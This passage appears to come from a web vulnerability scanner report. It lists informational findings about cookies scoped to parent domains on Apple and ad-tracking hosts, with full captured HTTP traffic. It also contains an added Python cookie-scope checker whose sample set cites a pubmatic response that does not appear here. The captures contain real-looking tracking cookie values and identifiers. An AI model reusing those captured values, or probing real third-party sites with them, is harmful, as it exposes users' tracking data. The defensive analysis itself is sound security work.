Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/lib/scriptaculous.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "1cf46-44d159ddcfc40"
If-Modified-Since: Tue, 13 May 2008 05:05:45 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Tue, 13 May 2008 05:05:45 GMT
ETag: "1cf46-44d159ddcfc40"
Cache-Control: max-age=466
Expires: Tue, 12 Jul 2011 18:06:52 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=...[SNIP]...; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


10.25. http://images.apple.com/global/scripts/search_decorator.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/search_decorator.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/search_decorator.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "230-4a05bce73b440"
If-Modified-Since: Thu, 07 Apr 2011 22:41:13 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 07 Apr 2011 22:41:13 GMT
ETag: "230-4a05bce73b440"
Cache-Control: max-age=529
Expires: Tue, 12 Jul 2011 18:07:55 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=uBJRarGVcixAAGSJWzd8d3vxOg/2vSQlRKgrn/RhMuw6NOSdGGc7KhKoy98rT4JxkLPJGcA3G9JVZAKGGUeg0rfqqiJYEIZH3tG4GNao0NE7SqYO5kHNKRZnb2vkIh1+qYDl2ifZGy0POZ8QUYLzaCgiyNlZL5VDv9NhNWAjp97Is3YF3y20l8guUegLMOCwy6y7HJkzOBGxL/wFIxpaDfsp6aWi54M6uHhC29rySJuwnL+BWcVS9xqn+jQhS7msFYsY6R18o5ZJvdSAXByGqbg5REtWpLPIc/PzKvQjdnFOwWp2VlAL0jSLM7hGj7OIeIhamPPUj0ngSnKdT4xp04otxwH1GY1IGzoRcshhLZQWrPkz1JsU7/uXu0Ed9ByhWoKIxYzGOjc2Ss00WUF3y8kbPP/lRbac1Y8eT9J6atlIuTt9+NMYlbNDfZm3kD6KaRdxmy6hzYkPx8geQioXgS601762LWOwcz+/LpnFHCVXRR2bOG+Hn/yrMTk2X42217IRhIBUtth/MeUn6F3SxLHf7nnWg02vBWP8Fq4jLMxGg1I5euN50ftaUZfEaj3A; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


10.26. http://images.apple.com/global/styles/base.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/styles/base.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/styles/base.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "7d0c-4a28e6fd30a00"
If-Modified-Since: Thu, 05 May 2011 21:55:52 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Thu, 05 May 2011 21:55:52 GMT
ETag: "7d0c-4a28e6fd30a00"
Cache-Control: max-age=499
Expires: Tue, 12 Jul 2011 18:07:25 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=...[SNIP]...; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


10.27. http://images.apple.com/global/styles/itunesmodule.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/styles/itunesmodule.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/styles/itunesmodule.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "d46-48f2ddda94180"
If-Modified-Since: Wed, 01 Sep 2010 07:44:22 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Wed, 01 Sep 2010 07:44:22 GMT
ETag: "d46-48f2ddda94180"
Cache-Control: max-age=506
Expires: Tue, 12 Jul 2011 18:07:32 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=...[SNIP]...; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


10.28. http://images.apple.com/itunes/home/styles/home.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /itunes/home/styles/home.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /itunes/home/styles/home.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "8aa-4a4e72621e9c0"
If-Modified-Since: Sat, 04 Jun 2011 18:36:31 GMT

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 30 Jun 2011 23:20:56 GMT
ETag: "90f-4a6f62728e600"
Vary: Accept-Encoding
Server: Apache/2.2.3 (Oracle)
X-Cached-Time: Fri, 01 Jul 2011 00:29:49 GMT
Cteonnt-Length: 2319
Content-Type: text/css
Content-Length: 2319
Cache-Control: max-age=339
Expires: Tue, 12 Jul 2011 18:04:45 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Set-Cookie: ccl=...[SNIP]...; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

/* heros */
#main .hero { padding-top:76px; padding-bottom:33px; *padding-bottom: 0; border-color: #E5E5E5 #DBDBDB #D2D2D2; background:#fafafa; background:-webkit-gradient(linear, 0 0, 0 100%, from(#f
...[SNIP]...

10.29. http://images.apple.com/itunes/styles/itunes.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /itunes/styles/itunes.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /itunes/styles/itunes.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "1c2a-4a4fc3ffb72c0"
If-Modified-Since: Sun, 05 Jun 2011 19:46:59 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Sun, 05 Jun 2011 19:46:59 GMT
ETag: "1c2a-4a4fc3ffb72c0"
Cache-Control: max-age=466
Expires: Tue, 12 Jul 2011 18:06:52 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=...[SNIP]...; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


10.30. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=pacsunwear_cs=1&betq=11722=423719nc=1310503191? HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&did=games
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; BASE=x7Q9ni23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Rbf0hn7jp9fCFhyHhGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGdwhGsOk0AZdUwkslKVCJkL3eHCKdue5CKYmQi/tQzZQgKe5KrRixKNB4Qxyr5mZC6aDHAlSZjdmk7zuiwXsX8/PTGAEVbwPw/pNOID7s5rzN9mUM7Zk/KlL!; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; F1=BQ+HN4EBAAAABAAAAUAAqBA; ROLL=U6APDjegFREW39A!; C2=NWwGOFJwAob0FEbsKewubaIDtKfAC0nRlJpwIg02FAHCdbdBwhwihXAcIQbmGAHCsGeBwhAQvaAcIQW4FAHCLppBwhQBaaAcIgZ4FAHCAGeBwhQ3gZAcIgJaGAHCcbpBwhAxBaAcIMqsGAHCBHoBwhgWaaAcIYnXGAHC1mpBwhQUXaAcI4xlGAHCEdpBwhQwZaAcIcxvGAHCY8rBwhQjWaAcIYxvGAHCKopBwhQRgaAcI0soGAHCZTeBwFZAfZOiGBaj0Xw+NXsYzGmAPSqBkRqHBUbNGbHsDGAzPaAe3KdAsyrR4Rb+BMzrGlnreQAL/ZEpGe7JrAah5A; GUID=MTMxMDM5Mzc0MTsxOjE2dDUxa28wOTRrMGt1OjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 12 Jul 2011 20:39:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=YELHOFJwAob0FYVsKawubaYstKfAC0nRKIpwIg02FUBCdbdBVgwihXQFIQbmGUBCsGeBVgAQvaQFIQW4FUBCLppBVgQBaaQFIgZ4FUBCAGeBVgQ3gZQFIgJaGUBCcbpBVgAxBaQFIMqsGUBCBHoBVggWaaQFIYnXGUBC1mpBVgQUXaQFI4xlGUBCEdpBVgQwZaQFIcxvGUBCY8rBVgQjWaQFIYxvGUBCKopBVgQRgaQFI0soGUBCZTeBVEZAfZOiGVUj0Xw+NX8BzGmAPSqBJQqHBUbNGvBsDGAzPaQH3KdAsyrRdQb+BMzrG5hreQAL/ZUSGerJrAahe3qyIcydGAH; domain=advertising.com; expires=Thu, 11-Jul-2013 20:39:52 GMT; path=/
Set-Cookie: GUID=MTMxMDUwMzE5MjsxOjE2dDUxa28wOTRrMGt1OjM2NQ; domain=advertising.com; expires=Thu, 11-Jul-2013 20:39:52 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Tue, 12 Jul 2011 21:39:52 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
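
The check behind these "cookie scoped to a parent domain" findings, as an added example that is not part of the scanner output: given the host that answered and its Set-Cookie lines, it applies RFC 6265 domain matching to decide whether each cookie is host-only, widened to the issuing host's own subdomains, widened to a parent domain (so every sibling subdomain can read and overwrite it), rejected by a browser, or merely being cleared, as DBC is above. The Set-Cookie values in SAMPLES are copied from the responses in this section (long values shortened); the JSESSIONID line is a constructed host-only cookie for contrast, and the name-based session-token heuristic is an assumption, not the scanner's rule.

```python
"""Added example (not scanner output): the check behind the 'cookie scoped to a
parent domain' findings. Session-name heuristic and JSESSIONID sample are assumed."""
from __future__ import annotations
import re
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Optional

SESSION_NAME_RE = re.compile(r"sess|sid$|token|auth|login", re.I)  # assumed heuristic
# Netscape "Sun, 29-Jun-2014 14:25:02 GMT" (as in the responses above), then RFC 1123.
_DATE_FORMATS = ("%a, %d-%b-%Y %H:%M:%S %Z", "%a, %d %b %Y %H:%M:%S %Z")

@dataclass(frozen=True)
class Finding:
    name: str
    scope: str  # host-only | same-host-domain | parent-domain | rejected | cleared
    likely_session: bool
    secure: bool
    httponly: bool

def parse_http_date(text: str) -> Optional[datetime]:
    """Parse an Expires/Date value; None if it matches neither wire format."""
    for fmt in _DATE_FORMATS:
        try:
            return datetime.strptime(text.strip(), fmt).replace(tzinfo=timezone.utc)
        except ValueError:
            continue
    return None

def parse_set_cookie(header_value: str):
    """Split a Set-Cookie value into name, value, attrs (lower-cased keys) and flags."""
    pieces = [p.strip() for p in header_value.split(";")]
    name, _, value = pieces[0].partition("=")
    attrs, flags = {}, set()
    for piece in filter(None, pieces[1:]):
        key, sep, val = piece.partition("=")
        if sep:
            attrs[key.strip().lower()] = val.strip()
        else:
            flags.add(key.strip().lower())
    return name.strip(), value, attrs, flags

def classify_scope(issuing_host: str, domain_attr: Optional[str]) -> str:
    """RFC 6265 domain matching between the issuing host and the Domain attribute."""
    if domain_attr is None:
        return "host-only"                    # returned only to the exact host
    domain = domain_attr.lower().lstrip(".")  # browsers ignore a leading dot
    host = issuing_host.lower()
    if "." not in domain:
        return "rejected"                     # bare TLD / public suffix: dropped
    if domain == host:
        return "same-host-domain"             # still widened to the host's subdomains
    if host.endswith("." + domain):
        return "parent-domain"                # readable/overwritable by sibling subdomains
    return "rejected"                         # Domain does not cover the issuing host

def audit_cookies(issuing_host: str, headers: list[str], response_date: str) -> list[Finding]:
    """Classify each Set-Cookie of one response; Expires <= Date or Max-Age <= 0 is a deletion."""
    now = parse_http_date(response_date)
    findings = []
    for header in headers:
        name, _value, attrs, flags = parse_set_cookie(header)
        cleared = False
        if attrs.get("max-age", "").lstrip("-").isdigit():
            cleared = int(attrs["max-age"]) <= 0
        elif "expires" in attrs:
            exp = parse_http_date(attrs["expires"])
            cleared = exp is not None and now is not None and exp <= now
        scope = "cleared" if cleared else classify_scope(issuing_host, attrs.get("domain"))
        findings.append(Finding(name, scope, bool(SESSION_NAME_RE.search(name)),
                                "secure" in flags, "httponly" in flags))
    return findings

# Set-Cookie values copied from the responses above (long values shortened);
# the JSESSIONID line is a constructed host-only cookie for contrast.
SAMPLES = [
    ("image2.pubmatic.com", "Tue, 12 Jul 2011 20:40:10 GMT",
     ["PUBRETARGET=571_1400116791.82_1400116792; domain=pubmatic.com; "
      "expires=Sun, 29-Jun-2014 14:25:02 GMT; path=/"]),
    ("images.apple.com", "Tue, 12 Jul 2011 17:59:06 GMT",
     ["geo=US; path=/; domain=.apple.com"]),
    ("leadback.advertising.com", "Tue, 12 Jul 2011 20:39:52 GMT",
     ["GUID=MTMxMDUwMzE5MjsxOjE2dDUxa28wOTRrMGt1OjM2NQ; domain=advertising.com; "
      "expires=Thu, 11-Jul-2013 20:39:52 GMT; path=/",
      "DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/"]),
    ("www.example.com", "Tue, 12 Jul 2011 20:39:52 GMT",
     ["JSESSIONID=0123456789abcdef; Path=/; Secure; HttpOnly"]),
]

def run_samples() -> dict[str, str]:
    """Cookie name -> scope over SAMPLES."""
    return {f.name: f.scope for host, date, hdrs in SAMPLES
            for f in audit_cookies(host, hdrs, date)}

if __name__ == "__main__":
    for f in (x for h, d, c in SAMPLES for x in audit_cookies(h, c, d)):
        print(f"{f.name:12} {f.scope:17} session={f.likely_session} secure={f.secure} httponly={f.httponly}")
```

Two points the scanner text leaves implicit. First, `domain=pubmatic.com` and `domain=.apple.com` are the same thing: browsers drop the leading dot, and any Domain attribute at all makes the cookie domain-matched, so even `Domain=images.apple.com` would be sent to hosts under images.apple.com. Second, the severity really does depend on what the cookie carries: a retargeting or geo value scoped to the parent is an integrity and privacy concern, whereas a session cookie scoped to the parent can be overwritten by any sibling subdomain (session fixation) and, without HttpOnly, read by script running on one, which is why the heuristic above flags the name and the Secure/HttpOnly flags alongside the scope.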

10.31. http://pixel.mathtag.com/data/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /data/img

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data/img?mt_id=100036&mt_dcid=1310503209 HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&ptid=HOME
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530; ts=1310488542; mt_mop=10001:1310488542|10002:1310068527|4:1308922018|5:1310068391

Response

HTTP/1.1 200 OK
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x1 pid 0x1b3d 6973
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Tue, 12 Jul 2011 20:40:11 GMT
Etag: 4dd07bc8-e97b-118c-3dec-7b8c5c306530
Connection: Keep-Alive
Set-Cookie: ts=1310503211; domain=.mathtag.com; path=/; expires=Wed, 11-Jul-2012 20:40:11 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

10.32. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=776749753;fpan=0;fpa=P0-1840915809-1310503155904;ns=0;url=http%3A%2F%2Fwww.popcap.com%2Fallgames.php;ref=http%3A%2F%2Fwww.popcap.com%2F;ce=1;je=1;sr=1920x1200x32;enc=n;ogl=;dst=1;et=1310503165109;tzo=300;a=p-9admVzrPiptk2;labels=Web.Casual HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.popcap.com/allgames.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dcd4b82-3e074-feeab-8b152; d=EFgAFPaeApll_6ixz4EBqAEBmgeBlw4ZrRpcjB9uThocKRkvrhkb4gzhXR4Q0Q4Q0ZOG_RGqL5EogQ9w4RB8gRmhDlTzDRuzCl4UAwUAyBO0HFO5E9FOEA_TD4sqgQAAyE8fpPc

Response

HTTP/1.1 302 Found
Connection: close
Location: http://www.burstnet.com/enlightn/8171//99D2/
Set-Cookie: d=EOIAFPaeApll_6ixz4EBrAEBmgeBlw4ZrRpcjB9uThocKRkvrhkb4gzhXR4Q0Q4Q0ZOG_RGqL5EogQ9w4RB8gRmhDlTzDRuzCl4UAwUAyBO0HFO5E9FOEA_TD4sqgQAAyE8Rw9pLsQ; expires=Mon, 10-Oct-2011 20:39:25 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Tue, 12 Jul 2011 20:39:25 GMT
Server: QS


10.33. http://pixel.rubiconproject.com/d.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /d.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /d.php?v=1224_1&cb=1310503209 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&ptid=HOME
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
